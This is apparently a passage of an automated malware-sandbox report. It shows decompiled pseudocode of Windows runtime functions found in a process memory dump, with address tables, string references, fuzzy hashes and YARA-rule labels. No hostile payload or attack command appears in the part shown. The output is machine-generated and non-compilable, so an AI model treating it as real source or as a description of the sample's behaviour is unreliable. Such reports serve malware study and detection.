						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x10d5350;
							if(_t109 != 0x10d5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0107FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E01075720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}

0x00fe2d8a
0x00fe2d8a
0x00fe2d92
0x00fe2d96
0x00fe2d9e
0x00fe2da0
0x00fe2da3
0x00fe2da5
0x00fe2da8
0x00fe2dab
0x00fe2db2
0x0103f9aa
0x0103f9ab
0x0103f9ae
0x0103f9ae
0x00fe2db8
0x00fe2dc2
0x0103f9b9
0x0103f9be
0x0103f9bf
0x0103f9bf
0x00fe2dcf
0x0103f9c9
0x00fe2dd5
0x00fe2dd5
0x00fe2dd5
0x00fe2dde
0x00fe2de1
0x00fe2e70
0x00fe2e72
0x00fe2e72
0x00fe2de7
0x00fe2deb
0x00fe2e7c
0x00fe2e83
0x00fe2e85
0x00fe2e8b
0x00fe2e8d
0x00fe2e92
0x00fe2e92
0x00fe2e85
0x00fe2df1
0x00fe2df7
0x00fe2df9
0x00fe2df9
0x00fe2dfc
0x00fe2dff
0x00fe2e02
0x00000000
0x00fe2e05
0x00fe2e0c
0x0103f9d9
0x00fe2e12
0x00fe2e12
0x00fe2e12
0x00fe2e1a
0x0103f9e3
0x0103f9e9
0x0103f9f0
0x0103f9f6
0x0103f9f8
0x0103f9f8
0x0103f9f0
0x00fe2e23
0x0103fa02
0x0103fa03
0x0103fa05
0x0103fa06
0x00000000
0x00fe2e29
0x00fe2e29
0x00fe2e2e
0x00fe2e34
0x00fe2e3e
0x00000000
0x00000000
0x00fe2e44
0x00fe2e47
0x00fe2e4d
0x00000000
0x00000000
0x00fe2e4f
0x00fe2e54
0x00000000
0x00000000
0x00fe2e5a
0x00fe2e5f
0x00fe2e9a
0x00fe2ea4
0x00fe2ea5
0x00fe2ea8
0x00fe2eaf
0x00fe2eb2
0x00fe2eb5
0x0103fae9
0x0103faeb
0x0103faed
0x0103faef
0x0103faf7
0x0103faf8
0x0103fafd
0x0103faff
0x0103fb04
0x0103fb04
0x0103faff
0x00fe2ec0
0x00fe2ec4
0x00fe2ec6
0x00fe2ec8
0x0103fb14
0x0103fb18
0x0103fb1e
0x0103fb21
0x0103fb21
0x00fe2ece
0x00fe2ece
0x00fe2ece
0x00fe2ed7
0x00fe2e61
0x00fe2e63
0x0103fa6b
0x0103fa71
0x0103fa76
0x0103fa78
0x0103fa8a
0x0103fa7a
0x0103fa83
0x0103fa83
0x0103fa8f
0x0103fa91
0x0103fa97
0x0103fa9d
0x0103faa4
0x0103faaa
0x0103faaf
0x0103fab1
0x0103fac3
0x0103fab3
0x0103fabc
0x0103fabc
0x0103fac8
0x0103facb
0x0103fadf
0x0103fadf
0x0103facb
0x0103faa4
0x0103fa91
0x00fe2e6f
0x00fe2e6f
0x00fe2e5f
0x0103fa13
0x0103fa15
0x0103fa17
0x0103fa1f
0x0103fa21
0x0103fa22
0x0103fa25
0x0103fa28
0x0103fa2f
0x0103fa2f
0x0103fa2a
0x0103fa2a
0x0103fa2a
0x0103fa31
0x0103fa34
0x0103fa36
0x0103fa3c
0x0103fa3e
0x0103fa41
0x0103fa43
0x0103fa45
0x0103fa45
0x0103fa41
0x0103fa3c
0x0103fa4a
0x0103fa4f
0x0103fa51
0x0103fa53
0x0103fa56
0x0103fa5b
0x0103fa5e
0x00000000
0x0103fa5e
0x00fe2e23

Strings

RTL: Re-Waiting, xrefs: 0103FA4A

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: 223fd25286f0e8e7476e6a84294292552e8d1a7b5cb6922d160d15b1e4337a57
Instruction ID: 33a3bcffa4be35dd66d0adbbbb7ecde21907ecf3c5952ac853c4377697afbf16
Opcode Fuzzy Hash: 223fd25286f0e8e7476e6a84294292552e8d1a7b5cb6922d160d15b1e4337a57
Instruction Fuzzy Hash: 87615671E00A969FDB72DB69C840BBE77ECEB84324F1402A6D991972C1D7349D019782

Uniqueness

Uniqueness Score: -1.00%

Function 010B0EA5, Relevance: 1.4, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E010B0EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E010AFF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E010B1074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E01029730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E010AA80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E010AA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x10d8b04 >> 0x14) + (_v44 -  *0x10d8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E01007D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E010A138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E01007D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E0109FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x10d8724 & 0x00000008) != 0) {
						E010A52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E010B15B5(0x10d8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}

0x010b0eb7
0x010b0eb9
0x010b0ec0
0x010b0ec2
0x010b0ecd
0x010b105b
0x010b105b
0x010b1061
0x010b1066
0x010b1066
0x010b106b
0x010b1073
0x010b1073
0x010b0ed3
0x010b0ed6
0x010b0edc
0x010b0ee0
0x010b0ee7
0x010b0ef0
0x010b0ef5
0x010b0efa
0x010b0efc
0x010b0efd
0x010b0f03
0x010b0f04
0x010b0f06
0x010b0f07
0x010b0f09
0x010b0f0e
0x010b0f14
0x010b0f23
0x010b0f2d
0x010b0f34
0x010b0f34
0x010b0f14
0x010b0f52
0x00000000
0x00000000
0x010b0f58
0x010b0f73
0x010b0f74
0x010b0f79
0x010b0f7d
0x010b0f80
0x010b0f86
0x010b0fab
0x010b0fb5
0x010b0fc6
0x010b0fd1
0x010b0fe3
0x010b0fd3
0x010b0fdc
0x010b0fdc
0x010b0feb
0x010b1009
0x010b1009
0x010b1015
0x010b1027
0x010b1017
0x010b1020
0x010b1020
0x010b102f
0x010b103c
0x010b103c
0x010b1048
0x010b1050
0x010b1050
0x010b1055
0x00000000
0x010b1055
0x010b0f88
0x010b0f9e
0x010b0fa2
0x010b0fa9
0x00000000
0x00000000
0x00000000
0x010b0fa9
0x00000000

Strings

`, xrefs: 010B0F16

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 62335bc0700b82fc9d7bb4086ca56b615d474ed638e810e35e506f61eda15644
Instruction ID: af6782fd764b6ebd0c37c1b4aad757565a746bdfba7fd8dbad8f360d486e4db5
Opcode Fuzzy Hash: 62335bc0700b82fc9d7bb4086ca56b615d474ed638e810e35e506f61eda15644
Instruction Fuzzy Hash: B5519A713043829BE325DF28E8D4B9BBBE5EB84704F04096DFAC687690D771E805CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0101F0BF, Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0101F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E01004120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E01029830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E01029990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E010295D0();
							goto L11;
						} else {
							_t109 = L01004620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E0102F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E010295D0();
										L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x0101f0d3
0x0101f0d9
0x0101f0e0
0x0101f0e7
0x0101f0f2
0x0101f0f4
0x0101f0f8
0x0101f100
0x0101f108
0x0101f10d
0x0101f115
0x0101f116
0x0101f11f
0x0101f123
0x0101f124
0x0101f12c
0x0101f130
0x0101f134
0x0101f13d
0x0101f144
0x0101f14b
0x0101f152
0x0105bab0
0x0105bab0
0x0101f158
0x0101f158
0x0101f15a
0x0101f160
0x0101f165
0x0101f166
0x0101f16f
0x0101f173
0x0105baa7
0x0105baa7
0x0105baab
0x00000000
0x0101f179
0x0101f18d
0x0101f191
0x0105baa2
0x00000000
0x0101f197
0x0101f19b
0x0101f1a2
0x0101f1a9
0x0101f1af
0x0101f1b2
0x0101f1b6
0x0101f1b9
0x0101f1c4
0x0101f1d8
0x0101f1df
0x0101f1e3
0x0101f1eb
0x0101f1ee
0x0101f1f4
0x0101f20f
0x0105bab7
0x0105babb
0x0105bacc
0x0105bad1
0x0101f215
0x0101f218
0x0101f226
0x0101f22b
0x00000000
0x0101f22b
0x0101f1f6
0x0101f1f6
0x0101f1f9
0x0101f1fb
0x0101f1fb
0x0101f1f4
0x0101f191
0x0101f173
0x0101f152
0x0101f203

Strings

@, xrefs: 0101F124

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: 8fdc252dfe0d6c5d905de37420e6de76e9be9535c9558e5b9a07d9786e5ff2c5
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: 85518F716047119FD321DF29C840AABBBF9FF48750F00892DFA9597690E7B4E914CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01063540, Relevance: 1.4, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E01063540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x10dd360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E01020BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E01063706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0102FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E01063540;
						E0102FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E0103DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E01070C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E010297C0();
					}
					return E0102B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E01063971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E01063884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0102FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E01029650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E01063787(_a4,  &_v352, _t80);
						}
					}
					L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E010295D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x01063552
0x0106355a
0x0106355d
0x01063566
0x01063567
0x0106357e
0x0106358f
0x010635a1
0x010635a5
0x0106366b
0x0106366b
0x0106366d
0x01063672
0x01063679
0x01063685
0x0106368d
0x0106369d
0x010636a7
0x010636b8
0x010636c6
0x010636c7
0x010636dc
0x010636e1
0x010636e7
0x010636e9
0x010636e9
0x01063703
0x01063703
0x010635b5
0x010635c0
0x010635c4
0x00000000
0x00000000
0x010635ca
0x010635d7
0x010635e2
0x010635e6
0x010635e8
0x010635f5
0x010635fa
0x01063603
0x01063604
0x01063609
0x0106360a
0x01063612
0x01063613
0x0106361e
0x01063622
0x01063628
0x0106362f
0x0106362f
0x01063636
0x01063638
0x0106363b
0x01063642
0x01063642
0x01063636
0x01063657
0x01063657
0x0106365c
0x01063662
0x01063669
0x00000000
0x00000000
0x00000000
0x00000000

Strings

BinaryHash, xrefs: 0106358F

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: 12ec3afecfbfb0e8b67c330d468658ba1f57af7b7d3379fced94bc1009d9e544
Instruction ID: 89d7be19221ae4357cf1ace0147799c841b77539bd02bb48f30a7a9ee2c44224
Opcode Fuzzy Hash: 12ec3afecfbfb0e8b67c330d468658ba1f57af7b7d3379fced94bc1009d9e544
Instruction Fuzzy Hash: CD4142F1D0052DABDB21DA50CC85FEEB77CAB54714F0085A5EA49AB241DB319E888FE4

Uniqueness

Uniqueness Score: -1.00%

Function 010B05AC, Relevance: 1.4, Strings: 1, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E010B05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E010B07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E01029730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E010AA80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E010AA854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E010B1293(_t79, _v40, E010B07DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E01007D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E010A138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

0x010b05c5
0x010b05ca
0x010b05d3
0x010b06db
0x010b06db
0x010b06dd
0x010b06e3
0x010b06e3
0x010b05dd
0x010b05e7
0x010b05f6
0x010b0600
0x010b0607
0x010b0610
0x010b0615
0x010b061a
0x010b061c
0x010b061e
0x010b0624
0x010b0625
0x010b0627
0x010b0628
0x010b0631
0x010b0640
0x010b064d
0x010b0654
0x010b0654
0x010b0631
0x010b066d
0x010b0674
0x00000000
0x00000000
0x010b0692
0x010b069e
0x010b06b0
0x010b06a0
0x010b06a9
0x010b06a9
0x010b06b8
0x010b06d6
0x010b06d6
0x00000000

Strings

`, xrefs: 010B0633

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction ID: 8f8828e649ad0adde63528c3903b2256daef612217638f83c7c50d1dcaf3490c
Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction Fuzzy Hash: C431E232700306ABE710DE28CC85FDB7BE9AB88754F144229FA949B284D770E904C791

Uniqueness

Uniqueness Score: -1.00%

Function 01063884, Relevance: 1.3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E01063884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E01029650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L01004620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E01029650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}

0x01063893
0x01063896
0x01063899
0x0106389f
0x010638a0
0x010638a4
0x010638a9
0x010638ac
0x010638ad
0x010638ae
0x010638af
0x010638b1
0x010638b4
0x010638bb
0x010638bc
0x010638bd
0x010638c4
0x010638c8
0x010638ca
0x010638ca
0x010638d5
0x0106393e
0x01063940
0x01063942
0x01063952
0x01063954
0x01063961
0x01063961
0x01063967
0x0106396e
0x0106396e
0x01063947
0x0106394c
0x00000000
0x0106394c
0x010638ea
0x010638ee
0x010638f8
0x010638f9
0x010638ff
0x01063900
0x01063902
0x01063903
0x0106390b
0x0106390f
0x01063950
0x00000000
0x01063950
0x01063915
0x0106391d
0x0106391d
0x01063922
0x01063926
0x00000000
0x01063928
0x0106392b
0x0106392b
0x01063935
0x01063937
0x01063937
0x00000000
0x01063935
0x01063926
0x010638f0
0x00000000

Strings

BinaryName, xrefs: 010638B4

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: cf87457310b0904703b30d1b866f1fc71ca53360bcc31f63beee45934be82da0
Instruction ID: abc62330088f1cb655fa51e9ca1aee9a0d5264c94ab0b686c16cdd741b950524
Opcode Fuzzy Hash: cf87457310b0904703b30d1b866f1fc71ca53360bcc31f63beee45934be82da0
Instruction Fuzzy Hash: BF31E832D0051AAFEB16DA58C945EAFB7B8FB44720F014169E998AB251D7319E00CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 0101D294, Relevance: 1.3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E0101D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x10dd360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E01004120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E0102B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E010298D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E010295D0();
					L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

0x0101d29c
0x0101d2a6
0x0101d2b1
0x0101d2b5
0x0101d2b6
0x0101d2bc
0x0101d2bd
0x0101d2be
0x0101d2bf
0x0101d2c2
0x0101d2c4
0x0101d2cc
0x0101d384
0x0101d34b
0x0101d34f
0x0101d350
0x0101d351
0x0101d35c
0x0101d35c
0x0101d2d6
0x0101d2da
0x0101d2e1
0x0101d361
0x0101d369
0x0101d36d
0x0101d2e3
0x0101d2e3
0x0101d2e3
0x0101d2e5
0x0101d2ed
0x0101d2f5
0x0101d2fa
0x0101d302
0x0101d303
0x0101d30b
0x0101d30f
0x0101d313
0x0101d318
0x0101d31c
0x0101d320
0x0101d379
0x0101d37d
0x00000000
0x00000000
0x0105affe
0x0105b001
0x0105b011
0x00000000
0x0101d322
0x0101d322
0x0101d330
0x0101d337
0x0101d35d
0x0101d339
0x0101d33f
0x0101d38c
0x0101d38c
0x0101d33f
0x0101d349
0x00000000
0x0101d349

Strings

@, xrefs: 0101D303

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 8a5fb735a3d31f9132942b77f55b3b9c576675a930d6aedba31ab77a4428fd9b
Instruction ID: ca14e4fdd16c7439f7763d37c1c05a328750590d319476f86225a275e18cb6be
Opcode Fuzzy Hash: 8a5fb735a3d31f9132942b77f55b3b9c576675a930d6aedba31ab77a4428fd9b
Instruction Fuzzy Hash: 15318DB1508305AFD361DF68C9849AFBBE8EB99654F004A2EF9D483250D739DD04CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00FF1B8F, Relevance: 1.3, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00FF1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
